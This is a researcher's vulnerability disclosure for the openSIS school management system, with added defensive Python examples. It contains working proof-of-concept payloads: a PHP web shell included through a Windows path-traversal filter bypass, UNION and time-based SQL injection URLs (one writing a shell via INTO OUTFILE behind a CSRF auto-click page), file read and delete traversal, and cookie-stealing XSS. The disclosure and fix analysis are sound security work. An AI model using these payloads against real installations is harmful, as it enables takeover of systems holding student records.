Vulnerabilities reported to OpenSIS
Some months ago I reported many vulnerabilities to OpenSIS (https://github.com/OS4ED/openSIS-Classic). They claim to have fixed all of them (https://github.com/OS4ED/openSIS-Classic/issues/291), so this is my original report with all its updates.
RCE via LFI
Description
By default the application allows staff users to upload .txt files (as well as images, PDF and Excel files). Through the file upload functionality it is possible to upload a .txt file whose content is PHP code. If we also have an LFI, we can include that .txt file and the PHP code inside it is executed.
I uploaded an unlisted video to my YouTube channel (you need the URL to see it) showing how to exploit the vulnerability, because it is a little complex; I hope the video helps.
Video Poc: https://youtu.be/n-cu-1JTO6c
I'm Brazilian, my English is not the best, sorry.
Proof of Concept
rce.txt, the file we need to upload using the Files functionality:
<?php
$x = system($_GET['cmd']);
header('X-Command-LFI: ' . $x);
?>
The files we upload are stored inside assets/stafffiles and the file name is {UserID}-name.txt. If a user with ID 10 uploads a file called info.txt, it is stored as assets/stafffiles/10-info.txt.
LFI and filter bypass
The LFI is in the Bottom.php file via the modname parameter, on line 53:
ob_start();
include('modules/'.sqlSecurityFilter($modname));
if($htmldocPath)
As we can see, the application passes our parameter through a function called sqlSecurityFilter before the call to include. If we analyse this function, we see that it filters the '../' string, so we cannot use it to exploit the LFI. On Windows systems, however, it is possible to exploit LFI vulnerabilities using '..\' instead of '../', and that string is not in the filter list.
To get command execution we need to upload the file and then use the LFI to include it.
PoC
http://localhost/openSIS-CE/Bottom.php?modfunc=print&modname=..\\assets\\stafffiles\\6-rcelfipoc.txt&cmd=whoami
Impact
Remote code execution
Occurrences
Bottom.php L53
LFI
ob_start();
include('modules/'.sqlSecurityFilter($modname));
if($htmldocPath)
Filter, functions/SqlSecurityFnc.php:38
$injectionParams = array('union ', 'select ', 'concat', 'concat_ws', 'create ', 'update ', 'insert ', 'delete ', 'extract ', 'drop ', 'truncate ', 'where ', 'trim ', 'format ', 'union%20', 'select%20', 'create%20', 'update%20', 'insert%20', 'delete%20', 'extract%20', 'drop%20', 'truncate%20', 'where%20', 'trim%20', 'format%20', ';', '\'', '--', '../', '..%2f', 'skip-grant-tables', 'sleep(', 'sleep (');
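Added example, not code from the original report or from openSIS: the blacklist quoted above, reproduced in Python and checked against the three traversal spellings, with the resulting include path normalised under Windows and POSIX rules. The page shows only the list, not what sqlSecurityFilter does with a match (strip or reject), so the function here just reports the matching entries; the file name 6-rcelfipoc.txt is the one from the PoC URL.

```python
import ntpath
import posixpath

# Blacklist copied from functions/SqlSecurityFnc.php:38 as quoted in the report.
INJECTION_PARAMS = [
    'union ', 'select ', 'concat', 'concat_ws', 'create ', 'update ', 'insert ',
    'delete ', 'extract ', 'drop ', 'truncate ', 'where ', 'trim ', 'format ',
    'union%20', 'select%20', 'create%20', 'update%20', 'insert%20', 'delete%20',
    'extract%20', 'drop%20', 'truncate%20', 'where%20', 'trim%20', 'format%20',
    ';', "'", '--', '../', '..%2f', 'skip-grant-tables', 'sleep(', 'sleep (',
]

# Prefix used by include('modules/'.sqlSecurityFilter($modname)) in Bottom.php.
MODULES_DIR = 'modules/'


def blacklisted_tokens(value):
    """Return the blacklist entries found in value (empty list = nothing matches).

    Only the list itself is known from the page; whether the real filter strips
    or rejects a hit is not shown, so this function only reports matches.
    """
    return [tok for tok in INJECTION_PARAMS if tok in value]


def resolved_include(modname, flavour):
    """Path the include() call actually opens, normalised with the given
    os.path flavour (ntpath for a Windows server, posixpath for Linux)."""
    return flavour.normpath(MODULES_DIR + modname)


def evaluate(modname):
    """Summarise one payload: what the blacklist catches and where it lands."""
    return {
        'blocked_by': blacklisted_tokens(modname),
        'windows': resolved_include(modname, ntpath),
        'posix': resolved_include(modname, posixpath),
    }


if __name__ == '__main__':
    for payload in ('../assets/stafffiles/6-rcelfipoc.txt',
                    '..%2fassets/stafffiles/6-rcelfipoc.txt',
                    '..\\assets\\stafffiles\\6-rcelfipoc.txt'):
        print(payload, evaluate(payload))
```

Whichever way the real filter treats a match, '..\' matches nothing in the list, and the ntpath result shows why the bypass only works against a Windows server: on Linux the backslash is an ordinary file-name character, so include() would look for a literally named file under modules/.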
Multiple SQL Injections
Description
This vulnerability allows low-level users to execute SQL commands. It is possible to build a CSRF PoC to perform the attack, so the attacker does not strictly need their own credentials: a logged-in victim's browser sends the request. It is also possible to get RCE if the database user has permission to execute "INTO OUTFILE".
Proof of Concept
SQLi PoC:
http://[Host+openSIS-CE directory]/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL--+-
Example version():
http://localhost/openSIS-CE/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL--+-
Example INTO OUTFILE (the quote closing the output path is supplied by the original query's trailing quote):
http://localhost/openSIS-CE/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'<?php%20system($_GET["cmd"]);?>',NULL+into+outfile+'C:\\xampp\\htdocs\\openSIS-CE\\pocsqlcsrf.php
CSRF PoC + RCE using "INTO OUTFILE"
<a href="http://localhost/openSIS-CE/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'<?php%20system($_GET[\'cmd\']);?>',NULL+into+outfile+'C:\\xampp\\htdocs\\openSIS-CE\\pocsqlcsrf.php" class="link">Link</a>
<script>
document.getElementsByClassName("link")[0].click();
</script>
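Added example, not from the original report or the openSIS code: the DownloadWindow.php query rebuilt in Python against an in-memory SQLite database, run with the report's down_id payload and, next to it, the same query with a bound parameter. SQLite has no version() or INTO OUTFILE, so the payload uses sqlite_version(); the table layout is a constructed stand-in that only has to match the payload's 11 columns. The ForExport.php INSERT from the Occurrences below is reproduced the same way to show the X-Forwarded-For value landing in the statement verbatim (other interpolated values are placeholders).

```python
import sqlite3

# Constructed stand-in schema. Only the column COUNT of user_file_upload matters:
# the report's payload supplies 11 values, so the real table must have 11 columns.
# Column names here are assumptions, not openSIS's schema.
SCHEMA = """
CREATE TABLE user_file_upload (
    id INTEGER PRIMARY KEY, download_id TEXT, file_name TEXT, file_path TEXT,
    file_type TEXT, uploaded_by TEXT, upload_date TEXT, c8 TEXT, c9 TEXT,
    c10 TEXT, c11 TEXT
);
INSERT INTO user_file_upload VALUES
    (1, 'abc123', '10-info.txt', 'assets/stafffiles/10-info.txt', 'txt',
     'staff10', '2023-01-01', NULL, NULL, NULL, NULL);
CREATE TABLE hacking_log (
    HOST_NAME TEXT, IP_ADDRESS TEXT, LOGIN_DATE TEXT, VERSION TEXT, PHP_SELF TEXT,
    DOCUMENT_ROOT TEXT, SCRIPT_NAME TEXT, MODNAME TEXT, USERNAME TEXT
);
"""

# down_id payload from the report, with MySQL's version() replaced by SQLite's
# sqlite_version(). The trailing "-- -" comments out the query's closing quote.
DOWN_ID_PAYLOAD = ("a'union select 1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,"
                   "sqlite_version(),NULL-- -")

# X-Forwarded-For payload from the ForExport.php PoC, kept verbatim.
XFF_PAYLOAD = "127.0.0.1',NULL,sleep(10),version(),version(),NULL,NULL,NULL)-- -"


def build_db():
    conn = sqlite3.connect(':memory:')
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, down_id):
    """DownloadWindow.php line 38 as written: down_id concatenated into the SQL."""
    sql = "SELECT * FROM user_file_upload WHERE download_id='" + down_id + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, down_id):
    """Same query with a bound parameter: the payload is only ever a string value."""
    return conn.execute(
        "SELECT * FROM user_file_upload WHERE download_id=?", (down_id,)).fetchall()


def leaked_version(rows):
    """Column 10 of the UNION row is where the payload places version()."""
    return rows[0][9] if rows else None


def vulnerable_log_sql(xff, modname='attack'):
    """The INSERT ForExport.php builds, with placeholder server values. Returned
    as text because SQLite cannot run MySQL's sleep()."""
    return ("INSERT INTO hacking_log (HOST_NAME,IP_ADDRESS,LOGIN_DATE,VERSION,PHP_SELF,"
            "DOCUMENT_ROOT,SCRIPT_NAME,MODNAME,USERNAME) values('localhost','" + xff +
            "','2023-04-01','x.y','/openSIS-CE/ForExport.php','C:/xampp/htdocs',"
            "'/openSIS-CE/ForExport.php','" + modname + "','admin')")


def safe_log_insert(conn, xff, modname='attack'):
    """Parameterised version: the header is stored as data and comes back unchanged."""
    conn.execute(
        "INSERT INTO hacking_log VALUES (?,?,?,?,?,?,?,?,?)",
        ('localhost', xff, '2023-04-01', 'x.y', '/openSIS-CE/ForExport.php',
         'C:/xampp/htdocs', '/openSIS-CE/ForExport.php', modname, 'admin'))
    return conn.execute("SELECT IP_ADDRESS FROM hacking_log").fetchall()[-1][0]


if __name__ == '__main__':
    db = build_db()
    print('leaked :', leaked_version(vulnerable_lookup(db, DOWN_ID_PAYLOAD)))
    print('bound  :', safe_lookup(db, DOWN_ID_PAYLOAD))
    print(vulnerable_log_sql(XFF_PAYLOAD))
    print('stored :', safe_log_insert(db, XFF_PAYLOAD))
```

The concatenated query returns a row whose tenth column is the database version, exactly the position the PoC URL reads it from; the bound-parameter query returns nothing for the payload and still finds the legitimate download_id. The same binding fixes every Group.php, AttendanceCodes.php and GenerateApi.php occurrence below, since all of them interpolate $_REQUEST values into the statement text.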
Impact
Run SQL commands and gain access to the database. If the SQL user has high privileges, it is possible to execute operating system commands.
Occurrences
Group.php L831
modules/messaging/Group.php line 831 is vulnerable to SQL Injection in the groupid parameter
if (isset($_REQUEST['group'])) {
if (implode(',', $_REQUEST['group']) == '') {
$select = "select * from mail_groupmembers where group_id=" . $_REQUEST['groupid'];
$list = DBGet(DBQuery($select));
foreach ($list as $m => $n) {
if ($list[$m]['ID'])
$del_id[] = $list[$m]['ID'];
}
Group.php L859
modules/messaging/Group.php line 859 is vulnerable to SQL Injection in the groupid parameter
if ($id2 == $id3)
echo "<script>load_link('Modules.php?modname=" . strip_tags(trim($_REQUEST[modname])) . "')</script>";
else {
$select = "SELECT * FROM mail_groupmembers WHERE GROUP_ID=$_REQUEST[groupid] AND ID NOT IN($id2)";
$list = DBGet(DBQuery($select));
foreach ($list as $i => $j) {
$del_id1[] = $list[$i]['ID'];
}
ForExport.php L132-L141
Adding the eleventh SQL injection: ForExport.php lines 132 to 141, via the X-Forwarded-For header.
PoC request (you need to be logged in; replace my PHPSESSID with yours):
GET /openSIS-CE/ForExport.php?modname=attack HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
X-Forwarded-For: 127.0.0.1',NULL,sleep(10),version(),version(),NULL,NULL,NULL)-- -
Cookie: PHPSESSID=aq1lsi8jce1v8v94b655v8qpcc
Vulnerable code, ForExport.php lines 132-141:
if ($_SERVER['HTTP_X_FORWARDED_FOR']){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
echo ""._youReNotAllowedToUseThisProgram."! "._thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured.".";
DBQuery("INSERT INTO hacking_log (HOST_NAME,IP_ADDRESS,LOGIN_DATE,VERSION,PHP_SELF,DOCUMENT_ROOT,SCRIPT_NAME,MODNAME,USERNAME) values('$_SERVER[SERVER_NAME]','$ip','".date('Y-m-d')."','$openSISVersion','$_SERVER[PHP_SELF]','$_SERVER[DOCUMENT_ROOT]','$_SERVER[SCRIPT_NAME]','$_REQUEST[modname]','".User('USERNAME')."')");
We can see that $ip, taken straight from the X-Forwarded-For header, is used directly in the SQL query.
Group.php L865
modules/messaging/Group.php line 865 is vulnerable to SQL Injection in the groupid parameter
$id = implode(',', $del_id1);
$select = "DELETE FROM mail_groupmembers WHERE GROUP_ID=$_REQUEST[groupid] AND ID IN($id)";
$not_in_group = DBQuery($select);
$mem_del = 'del';
unset($_REQUEST['modfunc']);
DownloadWindow.php L38
As we can see, the vulnerability occurs because down_id is concatenated into the query without any validation:
if(isset($_REQUEST['down_id']) && $_REQUEST['down_id']!='')
{
if ((isset($_REQUEST['studentfile']) && $_REQUEST['studentfile'] == 'Y') || (isset($_REQUEST['userfile']) && $_REQUEST['userfile'] == 'Y'))
$downfile_info = DBGet(DBQuery('SELECT * FROM user_file_upload WHERE id=\'' . $_REQUEST['down_id'] . '\''));
else
$downfile_info = DBGet(DBQuery('SELECT * FROM user_file_upload WHERE download_id=\'' . $_REQUEST['down_id'] . '\''))
AttendanceCodes.php L237
Another endpoint vulnerable to SQL injection, this time through the table parameter:
} elseif ($_REQUEST['table'] !== 'new' && $_REQUEST['modfunc'] == 'edit') {
$code_cat = DBGet(DBQuery('SELECT TITLE FROM attendance_code_categories WHERE id=' . $_REQUEST['table']));
$code_cat = $code_cat[1]['TITLE'];
$_openSIS['selected_tab'] = "Modules.php?modname=$_REQUEST[modname]&table=$_REQUEST[table]";
Request to trigger the vulnerability:
http://[openSIS Installation]/Ajax.php?modname=attendance/AttendanceCodes.php&modfunc=edit&id=5&ajax=true&table=0+union+select+sleep(10)
http://localhost/openSIS-CE/Ajax.php?modname=attendance/AttendanceCodes.php&modfunc=edit&id=5&ajax=true&table=0+union+select+sleep(10)
GenerateApi.php L45
Another endpoint vulnerable to SQL injection, this time through the id parameter:
if($_REQUEST['modfunc']=='remove')
{
DBQuery('DELETE FROM api_info WHERE ID='.$_REQUEST['id']);
}
Request to trigger the vulnerability:
http://[OpenSIS Install]/Ajax.php?modname=tools/GenerateApi.php&modfunc=remove&id=1 or sleep(3)&ajax=true
http://localhost/openSIS-CE/Ajax.php?modname=tools/GenerateApi.php&modfunc=remove&id=1%20or%20sleep(3)&ajax=true
Group.php L848
modules/messaging/Group.php line 848 is vulnerable to SQL Injection in the groupid parameter
else {
$mem_del = '';
$not_select = "select * from mail_groupmembers where GROUP_ID=$_REQUEST[groupid]";
$list1 = DBGet(DBQuery($not_select));
foreach ($list1 as $i => $j) {
$id_list[] = $j['ID'];
}
Group.php L875
modules/messaging/Group.php line 875 is vulnerable to SQL Injection in the groupid parameter
$no_of_member = DBGet(DBQuery('SELECT * FROM mail_groupmembers WHERE GROUP_ID=' . $_REQUEST['groupid']));
if (count($no_of_member) == 0)
echo "<script>load_link('Modules.php?modname=" . strip_tags(trim($_REQUEST[modname])) . "')</script>";
else {
Group.php L880
modules/messaging/Group.php line 880 is vulnerable to SQL Injection in the groupid parameter
$mem_del = '';
$delect_member = "delete from mail_groupmembers where GROUP_ID=$_REQUEST[groupid]";
$delect_member_qry = DBQuery($delect_member);
$mem_del = 'del';
unset($_REQUEST['modfunc']);
Group.php L840
modules/messaging/Group.php line 840 is vulnerable to SQL Injection in the groupid parameter
$id = implode(',', $del_id);
$mem_del = '';
$select = "DELETE FROM mail_groupmembers WHERE GROUP_ID=$_REQUEST[groupid] AND ID IN($id)";
$not_in_group = DBQuery($select);
$mem_del = 'del';
unset($_REQUEST['modfunc']);
echo "<script>load_link_group('Modules.php?modname=messaging/Group.php','2')</script>";
Request example
http://localhost/openSIS-CE/Modules.php?modname=messaging/Group.php&modfunc=memb
Path Traversal to read files
Description
I found a path traversal that allows reading files from the application and from the operating system.
Proof of Concept
Application:
http://localhost/openSIS-CE/DownloadWindow.php?filename=../Data.php
Windows OS:
http://localhost/openSIS-CE/DownloadWindow.php?filename=../../../../Windows/win.ini
Impact
Read access to application files and operating system files.
Occurrences
DownloadWindow.php L75
{
header('Content-Disposition: attachment; filename="'.urldecode($_REQUEST['name']).'" ');
readfile('assets/'.urldecode($_REQUEST['filename']));
}
Path Traversal to delete files
Description
I found a path traversal that allows deleting any application file and files in the OS. The payload must be base64 encoded in the removefile parameter.
Proof of Concept
target file = ../../PoC-Del.txt
http://localhost/openSIS-CE/Modules.php?modname=users/Staff.php&removefile=Li4vLi4vUG9DLURlbC50eHQ=&title=&include=FilesInc&modfunc=delete&delete_ok=1
target file = ../../../../PoC-OS-Level.txt
http://localhost/openSIS-CE/Modules.php?modname=users/Staff.php&removefile=Li4vLi4vLi4vLi4vUG9DLU9TLUxldmVsLnR4dA==&title=&include=FilesInc&modfunc=delete&delete_ok=1
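Added example, not part of the original report or of openSIS: a Python model of the two path traversal sinks in this report (readfile('assets/'...) in DownloadWindow.php and unlink('assets/stafffiles/'...) in Staff.php) together with the Bottom.php include from the LFI section. It decodes the base64 removefile payloads from the PoC above and runs every traversal string quoted in this report through a containment check that normalises the joined path and requires it to stay under the intended directory, modelling both a Windows (ntpath) and a Linux (posixpath) server. The legitimate file name 10-info.txt and the absolute path case are constructed inputs.

```python
import base64
import ntpath
import posixpath

# Base directories of the vulnerable calls quoted in the report.
STAFF_FILES = 'assets/stafffiles'   # unlink('assets/stafffiles/' . base64_decode($_REQUEST['removefile']))
ASSETS = 'assets'                    # readfile('assets/' . urldecode($_REQUEST['filename']))
MODULES = 'modules'                  # include('modules/' . sqlSecurityFilter($modname))

# removefile values from the two PoC URLs above.
REMOVEFILE_PAYLOADS = ['Li4vLi4vUG9DLURlbC50eHQ=', 'Li4vLi4vLi4vLi4vUG9DLU9TLUxldmVsLnR4dA==']


def decode_removefile(b64):
    """The removefile parameter is base64; this is the string unlink() receives."""
    return base64.b64decode(b64).decode()


def safe_join(base, user_path, flavour=posixpath):
    """Return base/user_path only if it still lies inside base after normalisation,
    otherwise None. flavour is ntpath or posixpath so both server types can be
    modelled. Production code should additionally realpath() the result once the
    file exists, so symlinks cannot escape either."""
    base_n = flavour.normpath(base)
    target = flavour.normpath(flavour.join(base_n, user_path))
    try:
        inside = flavour.commonpath([base_n, target]) == base_n
    except ValueError:          # absolute path or another drive was mixed in
        inside = False
    return target if inside and target != base_n else None


def classify_all():
    """Run every traversal string quoted in the report through safe_join."""
    results = {}
    for b64 in REMOVEFILE_PAYLOADS:
        rel = decode_removefile(b64)
        results['removefile:' + rel] = safe_join(STAFF_FILES, rel)
    for rel in ('../Data.php', '../../../../Windows/win.ini'):
        results['filename:' + rel] = safe_join(ASSETS, rel, ntpath)
    # LFI payload from the first section: rejected on Windows once paths are normalised
    results['modname:..\\assets'] = safe_join(MODULES, '..\\assets\\stafffiles\\6-rcelfipoc.txt', ntpath)
    # constructed inputs: a legitimate staff file and an absolute Windows path
    results['legit'] = safe_join(STAFF_FILES, '10-info.txt')
    results['absolute'] = safe_join(ASSETS, 'C:\\Windows\\win.ini', ntpath)
    return results


if __name__ == '__main__':
    for name, resolved in classify_all().items():
        print(f'{name:45} -> {resolved}')
```

Every payload from the report resolves to None (rejected) while the ordinary {UserID}-name.txt file is returned unchanged. The blacklist in SqlSecurityFnc.php and the base64 wrapping in Staff.php both fail because they inspect the raw string; the check above looks at where the path ends up after the operating system has interpreted it.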
Impact
It is possible to remove any application file, which breaks the entire application, and any OS file the web server process is allowed to delete.
Occurrences
Staff.php L679
The removefile parameter is not validated against path traversal:
if ($_REQUEST['modfunc'] == 'delete' && $_REQUEST['include'] == 'FilesInc' && (User('PROFILE') == 'admin' || User('PROFILE') == 'teacher')) {
if (DeletePromptFilesEncoded($_REQUEST['title'], '&include=FilesInc&category_id=7')) {
unlink('assets/stafffiles/' . base64_decode($_REQUEST['removefile']));
DBQuery('DELETE FROM user_file_upload WHERE ID=' . $_REQUEST['del']);
unset($_REQUEST['modfunc']);
}
Multiple XSS
Description
I noticed that the session cookie PHPSESSID is readable from JavaScript (the PoC below shows it in document.cookie), so I looked for a reflected XSS, found one in Validator.php lines 59 and 64, and was able to read the cookie with it.
Proof of Concept
http://localhost/openSIS-CE/validator.php?validate=pass_o&opt=<script>alert(document.cookie)</script>
Impact
An attacker can use this to steal users' cookies and impersonate them (Account Takeover, ATO).
Occurrences
TransferredOutModal.php L130
Adding a third XSS: the student_id and drop_code parameters on TransferredOutModal.php line 130.
PoC
http://localhost/openSIS-CE/TransferredOutModal.php?modfunc=detail&student_id=1"><script>alert(document.cookie)</script>&drop_code=1"><script>alert(document.domain)</script>
Vulnerable Code
echo '<input type="hidden" name="values[student_enrollment]['.$_REQUEST['student_id'].'][DROP_CODE]" value="'.$_REQUEST['drop_code'].'" />';
Validator.php L59-L64
The vulnerability occurs here because there is no sanitisation of $_GET['opt'] before it is echoed; htmlentities() can be used to prevent the XSS:
{
echo '1_'.$_GET['opt'];
}
else
{
echo '0_'.$_GET['opt'];
}
CoursePeriodModal.php L77
Adding a second XSS: the mode parameter in CoursePeriodModal.php.
Payload:
http://localhost/openSIS-CE/CoursePeriodModal.php?course_period_id=1&meet_date=1&cpv_id=1&subject_id=1&course_id=1&id=1&calendar_id=1&mode=c4v4r0n"><script>alert(document.cookie)</script>
Vulnerable code
}
//PopTableforWindow('header', $title);
echo "<FORM class=form-horizontal name=popform id=popform action=ForWindow.php?modname=schoolsetup/Courses.php&meet_date=" . $meet_date . "&modfunc=detail&mode=" . $_REQUEST['mode'] . "&subject_id=" . $subject_id . "&course_id=" . $course_id . "&course_period_id=" . $cp_id . "&calendar_id=" . $calendar_id . " METHOD=POST>";
echo '<div class="panel">';
echo '<div class="tabbable">';
DataImport.php L228
Adding the fourth XSS: file content in DataImport.php (the $value variable).
We need to create a malicious xlsx file to exploit this vulnerability. I uploaded an unlisted video (accessible with the URL only) to my YouTube account, so you can see how to exploit it.
Video PoC
https://youtu.be/G1cu-fy5-Cg
Vulnerable field ($value variable):
if ($value)
echo "<tr class=" . $class . "><td class='" . $class . " p-t-20'>" . $value . "</td><td><div id='" . preg_replace('/[()\/]/', '', $value) . "' class='text-center p-t-15'></div></td><td class=" . $class . ">" . SelectInput($valuee, 'stu[' . $value . ']', '', $options, 'N/A', ' onchange=drawmapping(this.value,' . 'k' . $i . ',' . preg_replace('/[()\/]/', '', $value) . ');') . "</td></tr>";
echo "<input type='hidden' name='student_map_value[]' id=k$i>";
Malicious Excel content (the first header cell carries the payload; columns are separated here with |):
<script>alert(document.cookie)</script> | lname | email
gon                                     | k     | email@a.com
kilua                                   | z     | email2@a.com
As an admin, go to Tools -> Data Import Utility -> Import Student Data and upload the malicious xlsx file.
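Added example, not code from the original report or from openSIS: the two sinks of DataImport.php line 228 that take $value directly (the table cell and the div id) rebuilt in Python next to an encoded version, plus the validator.php echo from the first XSS. It shows that the preg_replace that strips parentheses and slashes for the id is not an HTML encoder, and that html.escape (the Python counterpart of the htmlentities() suggested above) neutralises the payload from the xlsx header. The SelectInput() cell is left out because its markup is not shown on the page.

```python
import html
import re

# Payload used as the xlsx column header in the DataImport PoC above.
PAYLOAD = '<script>alert(document.cookie)</script>'


def strip_for_id(value):
    """What preg_replace('/[()\/]/', '', $value) leaves behind for the div id."""
    return re.sub(r'[()/]', '', value)


def render_vulnerable(value, cls='odd'):
    """The first two cells echoed by DataImport.php line 228: $value goes into the
    <td> untouched and into the div id after strip_for_id() only."""
    return ("<tr class=" + cls + "><td class='" + cls + " p-t-20'>" + value +
            "</td><td><div id='" + strip_for_id(value) +
            "' class='text-center p-t-15'></div></td></tr>")


def render_escaped(value, cls='odd'):
    """Same cells with an HTML encoder on the text interpolation and an allowlist
    on the id, which line 228 also reuses as a JavaScript identifier."""
    ident = re.sub(r'[^A-Za-z0-9_]', '', value) or 'col'
    return ("<tr class=" + cls + "><td class='" + cls + " p-t-20'>" +
            html.escape(value, quote=True) +
            "</td><td><div id='" + ident + "' class='text-center p-t-15'></div></td></tr>")


def validator_response(opt, ok=True, escape=False):
    """validator.php lines 59/64: echo '1_'.$_GET['opt'] or '0_'.$_GET['opt'].
    With escape=True the same response is emitted through the encoder."""
    body = html.escape(opt, quote=True) if escape else opt
    return ('1_' if ok else '0_') + body


def contains_script_tag(markup):
    """True if a literal <script tag survives, i.e. a browser would execute it."""
    return '<script' in markup.lower()


if __name__ == '__main__':
    print('id after preg_replace:', strip_for_id(PAYLOAD))
    print('vulnerable row executes:', contains_script_tag(render_vulnerable(PAYLOAD)))
    print('escaped row executes   :', contains_script_tag(render_escaped(PAYLOAD)))
    print('validator vulnerable   :', validator_response(PAYLOAD))
    print('validator escaped      :', validator_response(PAYLOAD, escape=True))
```

The stripped id still reads <script>alertdocument.cookie<script>, so even the one place the original code tries to clean up keeps the tag; the unfiltered <td> next to it is where the cookie alert in the video fires.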